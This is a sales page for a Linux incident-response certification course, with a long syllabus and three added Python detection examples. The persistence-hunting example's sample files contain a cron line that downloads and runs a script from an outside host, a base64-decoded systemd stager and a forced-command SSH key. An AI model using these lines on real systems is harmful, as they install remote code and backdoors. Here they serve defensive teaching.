
Legitimized [GIAC Linux Incident Responder (GLIR)] Expert-Led Video Course – MASTERYTRAIL

Original price was: $450.00. Current price is: $220.00.

End-to-End Video Recorded Training
Access 40+ hours of comprehensive, step-by-step video lectures.
Covers all exam domains, objectives, and practical scenarios.
Delivered by industry experts with real-world insights.
Self-paced learning: pause, replay, and learn at your convenience.
Comprehensive Study Book
A structured study book that provides in-depth theoretical coverage.
Simplifies complex concepts with diagrams, flowcharts, and case studies.
Acts as a complete reference guide before, during, and after your training.
Concise Study Guide
A quick revision tool designed for last-minute preparation.
Highlights key concepts, formulas, definitions, and exam essentials.
Easy-to-read format for fast recall and exam readiness.
Complete Exam Questions & Answers Bank
Includes up to 2000 real-style exam questions with detailed answers and explanations.
Covers all possible exam scenarios: multiple-choice, case-based, and application questions.
Provides rationale for correct and incorrect answers to strengthen understanding.
Helps in identifying weak areas and building exam confidence.
Why Choose This Package?
All-in-one solution: Training + Study Book + Study Guide + Exam Q&A.
Designed for success: Comprehensive, exam-focused, and practical.
Saves time & money: No need to buy multiple resources separately.
Ideal for first-time candidates as well as professionals seeking re-certification.

SKU: MASTERYTRAIL-DFGH-34NHLP1712

Lesson 1: Introduction to Linux Incident Response

1.1 Understanding Incident Response in Cybersecurity
1.2 Why Linux Incident Response Matters
1.3 Key Incident Response Principles
1.4 Linux in Enterprise Environments
1.5 Types of Linux Threats and Attacks
1.6 Role of an Incident Responder
1.7 Core Linux Incident Response Tools
1.8 Lifecycle of an Incident Response Process
1.9 Integrating GLIR with Organizational Security Strategy
1.10 Certification Overview and Career Benefits

Lesson 2: Linux Operating System Fundamentals

2.1 Linux Architecture Overview
2.2 Kernel and User Space
2.3 Linux File System Hierarchy
2.4 Common Linux Distributions in Enterprise
2.5 Linux Boot Process and Init Systems
2.6 System Daemons and Services
2.7 User Accounts and Privileges
2.8 File Permissions and Ownership
2.9 Logging Mechanisms in Linux
2.10 Package Management Systems

Lesson 3: Incident Response Methodology

3.1 NIST and SANS IR Frameworks
3.2 Phases of Incident Response
3.3 Preparation Phase for Linux IR
3.4 Detection and Analysis in Linux Systems
3.5 Containment Strategies for Linux
3.6 Eradication Approaches
3.7 Recovery Phase Best Practices
3.8 Post-Incident Activity and Documentation
3.9 Legal and Compliance Considerations
3.10 Role of Automation in IR

Lesson 4: Linux File System Forensics

4.1 File System Structures (EXT, XFS, Btrfs)
4.2 Metadata and Inode Analysis
4.3 File Timestamps and Interpretation
4.4 Recovering Deleted Files
4.5 Hidden Files and Directories
4.6 Mount Points and Storage Devices
4.7 Journaling and Transaction Logs
4.8 File Integrity Verification
4.9 Tools for File System Forensics
4.10 Case Study: Compromised File System

Lesson 5: Linux Logging and Audit Systems

5.1 Syslog Architecture
5.2 journald vs syslog-ng
5.3 Application-Level Logging
5.4 Kernel Logs and Security Events
5.5 Authentication Logs (/var/log/secure, /var/log/auth.log)
5.6 Auditd for Security Auditing
5.7 Configuring Log Rotation and Retention
5.8 Log Correlation with SIEM Tools
5.9 Detecting Log Manipulation
5.10 Practical Lab on Log Analysis

Lesson 6: Process and Memory Analysis

6.1 Understanding Linux Processes
6.2 Process Hierarchies and Trees
6.3 Investigating Suspicious Processes
6.4 ps, top, and htop Analysis
6.5 Memory Dump Collection Techniques
6.6 Analyzing Linux Core Dumps
6.7 Identifying Rogue Daemons
6.8 Detecting Rootkits in Memory
6.9 Volatility and Rekall for Linux Memory Analysis
6.10 Hands-On: Live Process Forensics

Lesson 7: User and Authentication Forensics

7.1 Linux User Account Structures (/etc/passwd, /etc/shadow)
7.2 Tracking User Activity with Logs
7.3 sudo and su Command Monitoring
7.4 SSH Access Logs and Keys
7.5 Investigating Unauthorized User Creation
7.6 Identifying Brute Force Attempts
7.7 PAM Authentication Modules
7.8 Analyzing Privilege Escalation Attempts
7.9 Detecting Backdoor Accounts
7.10 Hands-On: Authentication Log Analysis
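A worked example of the brute-force and privilege-escalation checks named in 7.3, 7.6 and 7.10, in Python. It is added here as an illustration and is not material from the course or from GIAC. The log lines are constructed to mimic the traditional syslog format of /var/log/secure and /var/log/auth.log; the thresholds (5 failures inside 60 s, a sudo-to-root within 10 min of the login) are illustrative assumptions.

```python
"""Brute-force triage over sshd/sudo lines from /var/log/secure or auth.log.

Added example for this listing, not course material. The log is constructed;
the year is absent from traditional syslog timestamps, so only relative time
is used. Thresholds (5 failures in 60 s, sudo within 10 min) are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: a password-guessing run from 203.0.113.7 that ends in a
# successful login and a sudo to root, plus normal activity from 198.51.100.5.
SAMPLE_LOG = """\
Mar  3 02:14:01 web01 sshd[4121]: Failed password for invalid user admin from 203.0.113.7 port 51822 ssh2
Mar  3 02:14:03 web01 sshd[4123]: Failed password for invalid user oracle from 203.0.113.7 port 51830 ssh2
Mar  3 02:14:05 web01 sshd[4125]: Failed password for root from 203.0.113.7 port 51844 ssh2
Mar  3 02:14:07 web01 sshd[4127]: Failed password for root from 203.0.113.7 port 51850 ssh2
Mar  3 02:14:09 web01 sshd[4129]: Failed password for deploy from 203.0.113.7 port 51858 ssh2
Mar  3 02:14:12 web01 sshd[4131]: Accepted password for deploy from 203.0.113.7 port 51866 ssh2
Mar  3 02:14:30 web01 sudo:   deploy : TTY=pts/1 ; PWD=/home/deploy ; USER=root ; COMMAND=/bin/bash
Mar  3 08:30:11 web01 sshd[5200]: Accepted publickey for alice from 198.51.100.5 port 40112 ssh2
Mar  3 08:31:02 web01 sshd[5202]: Failed password for alice from 198.51.100.5 port 40120 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ (?P<proc>sshd\[\d+\]|sudo): +(?P<msg>.*)$")
SSH_RE = re.compile(
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+")
SUDO_RE = re.compile(r"(?P<user>\S+) : .*USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")


def parse_events(text):
    """Turn raw lines into dicts; lines that are not sshd auth results or sudo entries are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # year-less; relative time only
        if m["proc"].startswith("sshd"):
            s = SSH_RE.match(m["msg"])
            if s:
                events.append({"ts": ts, "type": "ssh", **s.groupdict()})
        else:
            s = SUDO_RE.match(m["msg"])
            if s:
                events.append({"ts": ts, "type": "sudo", **s.groupdict()})
    return events


def find_brute_force(events, threshold=5, window_s=60):
    """Source IPs with >= threshold failures inside window_s, noting any later success."""
    by_ip = defaultdict(list)
    for e in events:
        if e["type"] == "ssh":
            by_ip[e["ip"]].append(e)
    findings = []
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e["result"] == "Failed"]
        for i, first in enumerate(fails):
            run = [f for f in fails[i:] if (f["ts"] - first["ts"]).total_seconds() <= window_s]
            if len(run) < threshold:
                continue
            # A success from the same source after the run is the interesting case.
            success = next((e for e in evs if e["result"] == "Accepted"
                            and e["ts"] >= run[-1]["ts"]), None)
            findings.append({
                "ip": ip, "failures": len(run),
                "users": sorted({f["user"] for f in run}),
                "success_user": success["user"] if success else None,
                "success_ts": success["ts"] if success else None,
            })
            break  # one finding per source is enough for triage
    return findings


def sudo_after_login(events, findings, within_s=600):
    """sudo to root by an account whose login immediately followed a brute-force run."""
    hits = []
    for f in findings:
        if f["success_user"] is None:
            continue
        for e in events:
            if (e["type"] == "sudo" and e["user"] == f["success_user"] and e["target"] == "root"
                    and 0 <= (e["ts"] - f["success_ts"]).total_seconds() <= within_s):
                hits.append((f["ip"], e["user"], e["cmd"]))
    return hits


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    bf = find_brute_force(evs)
    for f in bf:
        print(f"brute force from {f['ip']}: {f['failures']} failures against {f['users']}, "
              f"then accepted login as {f['success_user']}")
    for ip, user, cmd in sudo_after_login(evs, bf):
        print(f"sudo to root by {user} shortly after login from {ip}: {cmd}")
```

On hosts that log only to the journal, `journalctl -u ssh -u sudo -o short-iso` yields the same message bodies with a full ISO timestamp, which removes the year ambiguity; the sudo entry itself is the pivot point, because a guessed password followed by `sudo` to root is the moment the incident stops being "failed logins" and becomes a host compromise.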

Lesson 8: Network Forensics on Linux

8.1 Linux Network Stack Overview
8.2 ip, ss, and Legacy ifconfig/netstat for IR
8.3 Identifying Active Network Connections
8.4 Detecting Malicious Listening Ports
8.5 Packet Capture with tcpdump
8.6 Wireshark/Tshark for Linux Analysis
8.7 NetFlow and Network Traffic Analysis
8.8 Detecting Beaconing Activity
8.9 Firewall Logs and Intrusion Attempts
8.10 Practical Lab: Network Compromise Detection
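An added Python illustration of the beaconing check in 8.8 (also relevant to 11.6), not material from the course. The connection records are constructed to resemble a Zeek conn.log or polled `ss -tnp` output reduced to (epoch seconds, destination); the minimum-connection count and the jitter cutoff are assumed values.

```python
"""Beaconing detection on an outbound-connection timeline.

Added example, not course material. Records are constructed (epoch seconds,
"dst:port") pairs; min_conns and max_cv are illustrative assumptions.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed: a ~60 s beacon with a few seconds of jitter to 203.0.113.50:443,
# mixed with bursty, human-looking traffic to 198.51.100.20:443.
SAMPLE_CONNECTIONS = [
    (1700000000, "203.0.113.50:443"), (1700000062, "203.0.113.50:443"),
    (1700000118, "203.0.113.50:443"), (1700000181, "203.0.113.50:443"),
    (1700000240, "203.0.113.50:443"), (1700000297, "203.0.113.50:443"),
    (1700000361, "203.0.113.50:443"), (1700000419, "203.0.113.50:443"),
    (1700000005, "198.51.100.20:443"), (1700000009, "198.51.100.20:443"),
    (1700000150, "198.51.100.20:443"), (1700000151, "198.51.100.20:443"),
    (1700000390, "198.51.100.20:443"), (1700000391, "198.51.100.20:443"),
    (1700000395, "198.51.100.20:443"), (1700000600, "198.51.100.20:443"),
]


def inter_arrival(times):
    """Gaps in seconds between consecutive connections, after sorting."""
    t = sorted(times)
    return [b - a for a, b in zip(t, t[1:])]


def beacon_candidates(conns, min_conns=6, max_cv=0.2):
    """Destinations contacted at a near-constant interval.

    The coefficient of variation (stdev / mean) of the inter-arrival gaps is
    close to 0 for a fixed-sleep implant and large for interactive traffic.
    """
    by_dst = defaultdict(list)
    for ts, dst in conns:
        by_dst[dst].append(ts)
    out = []
    for dst, times in by_dst.items():
        if len(times) < min_conns:
            continue  # too few samples to call anything periodic
        gaps = inter_arrival(times)
        mu = mean(gaps)
        if mu == 0:
            continue  # duplicate timestamps, not a beacon
        cv = pstdev(gaps) / mu
        if cv <= max_cv:
            out.append({"dst": dst, "count": len(times),
                        "period_s": round(mu, 1), "jitter_cv": round(cv, 3)})
    return sorted(out, key=lambda r: r["jitter_cv"])


if __name__ == "__main__":
    for r in beacon_candidates(SAMPLE_CONNECTIONS):
        print(f"{r['dst']}: {r['count']} connections every ~{r['period_s']}s (cv={r['jitter_cv']})")
```

A fixed interval with a low coefficient of variation is the easy case. Implants that randomise sleep by 30 to 50 percent push the CV past this cutoff, so in practice the interval test is paired with other per-destination features (near-constant request sizes, a single process owning every connection, activity through the night) rather than used on its own.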

Lesson 9: Malware Analysis on Linux

9.1 Linux Malware Types and Techniques
9.2 Analyzing ELF Binaries
9.3 Detecting Malicious Shell Scripts
9.4 Cronjob Persistence Methods
9.5 Dynamic vs Static Malware Analysis
9.6 Sandboxing Linux Malware
9.7 Reverse Engineering Linux Backdoors
9.8 YARA Rules for Linux Malware Detection
9.9 Indicators of Compromise (IoCs) for Linux Malware
9.10 Hands-On: Analyzing a Linux Malware Sample

Lesson 10: Rootkits and Kernel-Level Threats

10.1 Rootkit Fundamentals
10.2 Types of Linux Rootkits
10.3 Kernel vs User-Space Rootkits
10.4 Detecting Hidden Processes
10.5 Identifying File System Redirection
10.6 Checking Kernel Modules (lsmod, modinfo)
10.7 Rootkit Scanners (chkrootkit, rkhunter)
10.8 Analyzing System Call Hooks
10.9 Advanced Kernel Memory Forensics
10.10 Case Study: Rootkit Investigation

Lesson 11: Threat Hunting in Linux

11.1 Principles of Threat Hunting
11.2 Hunting for Persistence Mechanisms
11.3 Analyzing Bash History Files
11.4 Searching for Hidden Crontabs
11.5 Detecting Anomalous Processes
11.6 Hunting for Suspicious Network Activity
11.7 Memory-Based Threat Hunting
11.8 YARA-Based Hunting on Linux
11.9 Using osquery for Threat Hunting
11.10 Hands-On: Threat Hunting Playbook

Lesson 12: Evidence Acquisition and Preservation

12.1 Importance of Chain of Custody
12.2 Live vs Dead Box Acquisition
12.3 Disk Imaging with dd and dc3dd
12.4 Network Traffic Capture
12.5 RAM Capture Best Practices
12.6 File Hashing and Verification
12.7 Metadata Preservation
12.8 Ensuring Forensic Soundness
12.9 Using Write Blockers in Linux Investigations
12.10 Hands-On: Creating Forensic Images

Lesson 13: Log Correlation and SIEM Integration

13.1 Centralized Log Management in Linux
13.2 Syslog Forwarding
13.3 SIEM Tools (Splunk, ELK, Graylog)
13.4 Parsing Linux Security Logs
13.5 Normalizing Event Data
13.6 Correlation Rules for Linux Security
13.7 Alerting on Suspicious Activity
13.8 Detecting Insider Threats via Logs
13.9 Cloud SIEM Integration for Linux Systems
13.10 Hands-On: Building a Linux Log Dashboard

Lesson 14: Incident Scoping and Impact Assessment

14.1 Identifying Scope of Linux Incidents
14.2 Defining Impact in Business Terms
14.3 Classifying Incident Severity Levels
14.4 Data Exfiltration Indicators
14.5 Assessing Service Availability Impact
14.6 Evaluating Confidentiality and Integrity Breaches
14.7 Determining Affected Systems
14.8 Incident Timeline Reconstruction
14.9 Reporting to Stakeholders
14.10 Hands-On: Incident Scoping Exercise

Lesson 15: Containment Strategies for Linux Attacks

15.1 Isolating Compromised Hosts
15.2 Stopping Malicious Processes
15.3 Blocking Suspicious IPs and Ports
15.4 Temporary User Lockdowns
15.5 Network Segmentation for Containment
15.6 Using iptables and firewalld for Quick Defense
15.7 Containing Insider Threats
15.8 Using Snapshots for Containment
15.9 Rolling Back Changes Safely
15.10 Practical Lab: Live Containment Scenarios

Lesson 16: Eradication and Recovery in Linux

16.1 Removing Malware and Backdoors
16.2 Cleaning Suspicious Cronjobs
16.3 Verifying System Binaries Integrity
16.4 Kernel Patch Management
16.5 User Account Cleanup
16.6 Restoring from Clean Backups
16.7 Hardening System Configurations
16.8 Application Reinstallation Strategies
16.9 Business Continuity Planning
16.10 Case Study: Linux Recovery Plan

Lesson 17: Linux Incident Response Automation

17.1 Bash Scripting for IR
17.2 Python Automation for Linux Forensics
17.3 Automating Log Collection
17.4 Automated IoC Scanning
17.5 Orchestration Tools (Ansible, Puppet)
17.6 Using Cron for IR Automation
17.7 Automating Evidence Preservation
17.8 Integration with SOAR Platforms
17.9 Automated Threat Hunting Scripts
17.10 Hands-On: Build an IR Automation Script

Lesson 18: Cloud and Virtual Linux Incident Response

18.1 Linux in Cloud Environments
18.2 Incident Response in AWS EC2 Instances
18.3 GCP Linux VM Security Monitoring
18.4 Azure Linux IR Considerations
18.5 Hypervisor-Level Threats
18.6 Containerized Linux Incident Response
18.7 Docker Forensics Techniques
18.8 Kubernetes Incident Response
18.9 Snapshots and Cloud Logging
18.10 Hands-On: Linux Cloud Incident Response

Lesson 19: Insider Threat Investigations

19.1 Characteristics of Insider Threats
19.2 Detecting Unauthorized User Behavior
19.3 File Access Monitoring
19.4 Command History Investigations
19.5 Privilege Misuse Detection
19.6 Unauthorized Data Transfers
19.7 Behavioral Analytics on Linux
19.8 Correlation with HR/Employee Data
19.9 Case Studies of Insider Attacks
19.10 Practical Lab: Insider Threat Detection

Lesson 20: Digital Forensics Tools for Linux IR

20.1 Sleuth Kit and Autopsy
20.2 Plaso (Log2Timeline)
20.3 Foremost and Scalpel File Recovery
20.4 Binwalk for Binary Analysis
20.5 Linux Timeline Analysis Tools
20.6 Memory Analysis Tools for Linux
20.7 Network Forensics Tools (Bro/Zeek)
20.8 File Integrity Monitoring (AIDE, Tripwire)
20.9 Multi-Tool IR Frameworks (GRR, Velociraptor)
20.10 Hands-On: Tool Integration Exercise

Lesson 21: Threat Intelligence for Linux Incidents

21.1 Role of Threat Intelligence in IR
21.2 Types of Threat Intelligence (Tactical, Operational, Strategic)
21.3 Open-Source Threat Intelligence Feeds
21.4 Integrating IoCs into Linux Defense
21.5 STIX/TAXII for Threat Intel Sharing
21.6 Analyzing Threat Actor TTPs
21.7 Linux-Specific Threat Campaigns
21.8 Enriching Logs with Threat Intel
21.9 Collaboration with ISACs and CERTs
21.10 Practical Lab: Applying Threat Intel

Lesson 22: Persistence Mechanisms in Linux

22.1 Common Linux Persistence Techniques
22.2 Cronjobs and At Jobs
22.3 Modifying Init and Systemd Scripts
22.4 SSH Key Abuse
22.5 LD_PRELOAD Hijacking
22.6 Kernel Module Persistence
22.7 Malicious Aliases and Bashrc Edits
22.8 Hidden Startup Scripts
22.9 Detecting and Removing Persistence
22.10 Hands-On: Persistence Hunting
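An added Python illustration of the persistence hunt covered by 22.2 through 22.5, 22.7 and 22.9 (and the crontab and bash-history hunting in Lesson 11), not material from the course. The bundle is a constructed dict of path to file contents standing in for files collected from a host or a mounted image; the indicator patterns are assumptions and will need tuning to the environment.

```python
"""Persistence triage over a collected set of configuration files.

Added example, not course material. BUNDLE is a constructed stand-in for
files copied off a host; every pattern below is an illustrative assumption.
"""
import re

BUNDLE = {
    "/etc/ld.so.preload": "/usr/lib/libsystemd-helper.so\n",
    "/etc/crontab": ("SHELL=/bin/sh\n"
                     "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
                     "*/5 * * * * root curl -s http://203.0.113.9/x.sh | sh\n"),
    "/var/spool/cron/crontabs/deploy": "@reboot /dev/shm/.cache/agent\n",
    "/home/deploy/.bashrc": ("alias ls='ls --color=auto'\n"
                             "alias ps='/dev/shm/.cache/ps'\n"),
    "/etc/systemd/system/sysupdate.service": (
        "[Service]\nExecStart=/bin/sh -c 'echo L2Rldi9zaG0vLmNhY2hlL2FnZW50 | base64 -d | sh'\n"
        "[Install]\nWantedBy=multi-user.target\n"),
    "/root/.ssh/authorized_keys": (
        "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyDataAAAAAAAAAAAAAAAAAAAAAAA alice@laptop\n"
        "command=\"/dev/shm/.cache/agent\",no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExample attacker\n"),
}

# World-writable staging dirs, or a hidden path component; download-and-run / base64 stagers.
SUSPICIOUS_PATH = re.compile(r"(/dev/shm|/tmp|/var/tmp)/|/\.[^/\s]+")
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|base64\s+(-d|--decode)")
SHADOWED_CMDS = {"ps", "ls", "netstat", "ss", "lsof", "top", "find"}


def check_ld_preload(content):
    """Any live entry in /etc/ld.so.preload is loaded into every dynamic process: always review."""
    libs = [l.strip() for l in content.splitlines() if l.strip() and not l.startswith("#")]
    return [f"ld.so.preload loads {lib}" for lib in libs]


def check_cron(path, content):
    hits = []
    for line in content.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or "=" in s.split()[0]:
            continue  # blank, comment, or VAR=value line
        if DOWNLOAD_EXEC.search(s) or SUSPICIOUS_PATH.search(s):
            hits.append(f"{path}: {s}")
    return hits


def check_shell_rc(path, content):
    hits = []
    for line in content.splitlines():
        m = re.match(r"\s*alias\s+(\w+)=(.*)", line)
        if m and m.group(1) in SHADOWED_CMDS and SUSPICIOUS_PATH.search(m.group(2)):
            hits.append(f"{path}: {m.group(1)} shadowed -> {m.group(2)}")
        elif SUSPICIOUS_PATH.search(line) or DOWNLOAD_EXEC.search(line):
            hits.append(f"{path}: {line.strip()}")
    return hits


def check_systemd_unit(path, content):
    return [f"{path}: {line.strip()}" for line in content.splitlines()
            if line.startswith("ExecStart")
            and (SUSPICIOUS_PATH.search(line) or DOWNLOAD_EXEC.search(line))]


def check_authorized_keys(path, content):
    """A key line not starting with a key type carries an options field (command=, etc.)."""
    return [f"{path}: key with options: {l.strip()[:60]}" for l in content.splitlines()
            if l.strip() and not l.startswith("#")
            and not l.startswith(("ssh-", "ecdsa-", "sk-"))]


def hunt(bundle):
    findings = []
    for path, content in bundle.items():
        if path == "/etc/ld.so.preload":
            findings += check_ld_preload(content)
        elif "/cron" in path:
            findings += check_cron(path, content)
        elif path.endswith((".bashrc", ".profile", ".bash_profile", ".zshrc")) \
                or path.startswith("/etc/profile.d"):
            findings += check_shell_rc(path, content)
        elif path.endswith((".service", ".timer")):
            findings += check_systemd_unit(path, content)
        elif path.endswith("authorized_keys"):
            findings += check_authorized_keys(path, content)
    return findings


if __name__ == "__main__":
    for f in hunt(BUNDLE):
        print(f)
```

Collect the bundle from a mounted image, or with statically linked binaries from read-only media, rather than with the host's own `cat` and `ls`: a user-space rootkit installed through the very ld.so.preload entry this script flags can filter what those binaries return, and the shadowed `ps` alias above exists precisely to hide the agent from an interactive investigator.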

Lesson 23: Linux Host Hardening for IR Readiness

23.1 Security Baselines for Linux
23.2 Disabling Unnecessary Services
23.3 Secure SSH Configuration
23.4 Strong Password and Key Policies
23.5 File Integrity Monitoring Tools
23.6 Mandatory Access Controls (SELinux, AppArmor)
23.7 Sysctl Hardening for Networking
23.8 Secure Logging Configurations
23.9 Patch and Update Management
23.10 Practical Lab: Hardening a Linux Host

Lesson 24: Data Exfiltration on Linux

24.1 Techniques for Data Exfiltration
24.2 Exfiltration via SSH and SCP
24.3 HTTP/HTTPS Data Leaks
24.4 Covert Channels (ICMP, DNS)
24.5 Analyzing Outbound Traffic
24.6 Detecting Encrypted Tunnels
24.7 Insider Threat Data Theft
24.8 Network DLP Solutions for Linux
24.9 Correlating Logs for Exfiltration Detection
24.10 Hands-On: Data Exfiltration Analysis

Lesson 25: Insider and Advanced Persistent Threats (APTs)

25.1 Understanding APT Characteristics
25.2 Linux as a Target for APTs
25.3 Lateral Movement in Linux Environments
25.4 Privilege Escalation in APT Campaigns
25.5 Advanced Persistence in Linux
25.6 Stealth Techniques of APTs
25.7 APT Case Studies on Linux Systems
25.8 Detecting Low-and-Slow Attacks
25.9 Tools for APT Detection in Linux
25.10 Practical Lab: APT Simulation

Lesson 26: Disk Forensics on Linux Systems

26.1 Disk Imaging Techniques
26.2 Partition Table Analysis
26.3 File Carving with Linux Tools
26.4 Deleted Partition Recovery
26.5 Encrypted Disk Analysis
26.6 Swap Space Forensics
26.7 Logical Volume Manager (LVM) Forensics
26.8 RAID and Complex Storage Analysis
26.9 Disk Hashing and Verification
26.10 Hands-On: Disk Investigation

Lesson 27: Memory Acquisition and Analysis

27.1 Importance of Linux Memory Forensics
27.2 Memory Acquisition Tools (LiME, AVML)
27.3 Dumping Memory from Virtual Machines
27.4 Volatility Profiles for Linux
27.5 Kernel Memory Structures
27.6 Analyzing Running Processes in RAM
27.7 Extracting Network Connections from Memory
27.8 Detecting In-Memory Malware
27.9 Timeline Analysis from Memory Dumps
27.10 Practical Lab: Memory Case Study

Lesson 28: Email and Messaging Investigations

28.1 Email Infrastructure on Linux Servers
28.2 Forensic Analysis of Mail Logs
28.3 SMTP, IMAP, POP3 Tracking
28.4 Detecting Phishing Campaigns
28.5 Linux Email Header Analysis
28.6 Investigating Webmail Logs
28.7 Linux-Based Messaging Apps (IRC, XMPP)
28.8 Data Exfiltration via Email
28.9 Email Evidence Preservation
28.10 Hands-On: Email Compromise Case

Lesson 29: Database Forensics on Linux

29.1 Common Databases on Linux (MySQL, PostgreSQL)
29.2 Investigating Unauthorized Access
29.3 Log Files for Database Forensics
29.4 SQL Injection Detection
29.5 Recovering Deleted Database Entries
29.6 Tracking Insider Database Abuse
29.7 Encryption in Databases
29.8 Database Backups as Evidence
29.9 Forensic Tools for Database Analysis
29.10 Hands-On: Database Incident

Lesson 30: Web Server Incident Response

30.1 Apache and Nginx Forensics
30.2 Web Application Logs (/var/log/httpd or /var/log/apache2, /var/log/nginx)
30.3 SQL Injection Attack Detection
30.4 Webshell Detection on Linux Servers
30.5 CMS Exploits (WordPress, Drupal, Joomla)
30.6 SSL/TLS Log Analysis
30.7 File Integrity Checks on Webroots
30.8 Access Log Correlation
30.9 Recovering Compromised Websites
30.10 Practical Lab: Web Server IR

Lesson 31: Container Incident Response

31.1 Container Security Challenges
31.2 Docker Architecture and Risks
31.3 Forensic Acquisition of Containers
31.4 Identifying Malicious Container Images
31.5 Docker Log Analysis
31.6 Container Runtime Forensics
31.7 Kubernetes Incident Response Workflow
31.8 Detecting Escapes from Containers
31.9 Best Practices for Container IR
31.10 Hands-On: Docker Incident Analysis

Lesson 32: Ransomware in Linux Environments

32.1 Linux Ransomware Evolution
32.2 Common Attack Vectors for Ransomware
32.3 File Encryption Detection on Linux
32.4 Ransomware Persistence Methods
32.5 Monitoring File System Changes
32.6 Backup and Recovery Strategies
32.7 Incident Response to Ransomware
32.8 Case Studies of Linux Ransomware
32.9 Negotiation and Legal Considerations
32.10 Hands-On: Ransomware Detection

Lesson 33: Industrial and IoT Linux Incident Response

33.1 Role of Linux in IoT/OT Systems
33.2 Incident Response in Industrial Linux Devices
33.3 Unique IoT Attack Vectors
33.4 Embedded Linux Forensics
33.5 Log Collection in IoT Devices
33.6 IoT Botnet Investigations
33.7 IoT Firmware Analysis
33.8 Incident Response in SCADA/ICS Systems
33.9 Securing IoT Linux Devices Post-Incident
33.10 Case Study: IoT Botnet Attack

Lesson 34: Supply Chain and Open Source Threats

34.1 Linux Package Supply Chain Risks
34.2 Dependency Attacks in Linux Systems
34.3 Malicious Code in Open Source Packages
34.4 Detecting Backdoored Libraries
34.5 Verifying GPG Package Signatures
34.6 Git Repository Forensics
34.7 Compromised Build Servers
34.8 Monitoring Open Source Threats
34.9 Post-Incident Supply Chain Mitigation
34.10 Practical Lab: Supply Chain Breach

Lesson 35: Incident Documentation and Reporting

35.1 Importance of Documentation in IR
35.2 Standard Incident Reporting Templates
35.3 Recording Evidence in Linux Cases
35.4 Chain of Custody Documentation
35.5 Communicating with Executives
35.6 Regulatory Reporting (GDPR, HIPAA, PCI DSS)
35.7 Using Ticketing Systems for IR
35.8 Post-Incident Lessons Learned Reports
35.9 Continuous Improvement via Reports
35.10 Hands-On: Drafting an IR Report

Lesson 36: Insider Threat Red Team Simulation

36.1 Understanding Red Team Methodology
36.2 Simulating Insider Linux Attacks
36.3 Creating Fake Accounts
36.4 Deploying Rogue Processes
36.5 Mimicking Data Exfiltration
36.6 Red Team Toolkits for Linux
36.7 Detection Evasion Tactics
36.8 Collecting IR Team Responses
36.9 Evaluating Incident Response Effectiveness
36.10 Practical Lab: Red Team vs IR

Lesson 37: Security Monitoring with Linux Tools

37.1 Host-Based IDS (OSSEC, Wazuh)
37.2 Network IDS on Linux (Snort, Suricata)
37.3 Real-Time Monitoring with Auditd
37.4 Using Sysdig for Security Events
37.5 osquery for Continuous Monitoring
37.6 Integrating SIEM Alerts
37.7 Detecting File Integrity Changes
37.8 Monitoring Command Execution
37.9 Correlating Multi-Host Activity
37.10 Hands-On: Linux Monitoring Lab

Lesson 38: Incident Coordination and Teamwork

38.1 Role of an IR Team in Linux Cases
38.2 IR Team Roles and Responsibilities
38.3 Coordinating Across Teams (IT, HR, Legal)
38.4 Incident Response Playbooks
38.5 Communication During Linux Incidents
38.6 Avoiding Alert Fatigue
38.7 Escalation Procedures
38.8 Stakeholder Engagement
38.9 Post-Incident Collaboration Meetings
38.10 Case Study: Coordinated Linux IR

Lesson 39: Cyber Crisis Management

39.1 Definition of a Cyber Crisis
39.2 Crisis Management Frameworks
39.3 Handling Widespread Linux Attacks
39.4 Managing Media and Public Relations
39.5 Regulatory Obligations During Crisis
39.6 Decision-Making Under Pressure
39.7 Business Continuity During Crisis
39.8 Lessons Learned Post-Crisis
39.9 Building Crisis Simulations
39.10 Hands-On: Crisis Management Drill

Lesson 40: Incident Response Metrics and KPIs

40.1 Importance of Metrics in IR
40.2 Mean Time to Detect (MTTD)
40.3 Mean Time to Respond (MTTR)
40.4 Incident Containment Timeframes
40.5 Percentage of Incidents Detected via Automation
40.6 Linux-Specific Incident Metrics
40.7 Tracking Repeat Incidents
40.8 Incident Cost Estimation
40.9 Reporting KPIs to Executives
40.10 Hands-On: Build an IR Metrics Dashboard

Lesson 41: Digital Evidence Handling in Court

41.1 Legal Frameworks for Evidence
41.2 Chain of Custody in Linux Investigations
41.3 Admissibility of Linux Digital Evidence
41.4 Expert Witness Role
41.5 Cross-Border Evidence Challenges
41.6 Data Privacy Regulations
41.7 Court Presentation of Linux IR Findings
41.8 Documentation for Legal Cases
41.9 Past Case Studies Involving Linux
41.10 Hands-On: Mock Court Presentation

Lesson 42: Linux Honeypots for Incident Detection

42.1 Role of Honeypots in IR
42.2 Deploying Linux-Based Honeypots
42.3 Low vs High Interaction Honeypots
42.4 Cowrie SSH Honeypot
42.5 Kippo and Other Honeypot Frameworks
42.6 Collecting Attacker TTPs
42.7 Integrating Honeypots with SIEM
42.8 Legal and Ethical Considerations
42.9 Analyzing Honeypot Logs
42.10 Hands-On: Deploy a Linux Honeypot

Lesson 43: Machine Learning in Linux IR

43.1 Role of ML in Security Monitoring
43.2 ML Models for Anomaly Detection
43.3 Training Models with Linux Logs
43.4 Detecting Outlier Network Traffic
43.5 Identifying Malicious Commands via ML
43.6 Using ML in SIEM Platforms
43.7 Advantages and Limitations of ML in IR
43.8 Case Studies of ML in Incident Response
43.9 Open Source ML Security Tools
43.10 Hands-On: Build an ML Anomaly Detector

Lesson 44: Incident Response in Hybrid Environments

44.1 Linux in Hybrid Cloud Architectures
44.2 Multi-Cloud Incident Response Challenges
44.3 On-Prem vs Cloud Linux Forensics
44.4 Centralized Log Collection in Hybrid IR
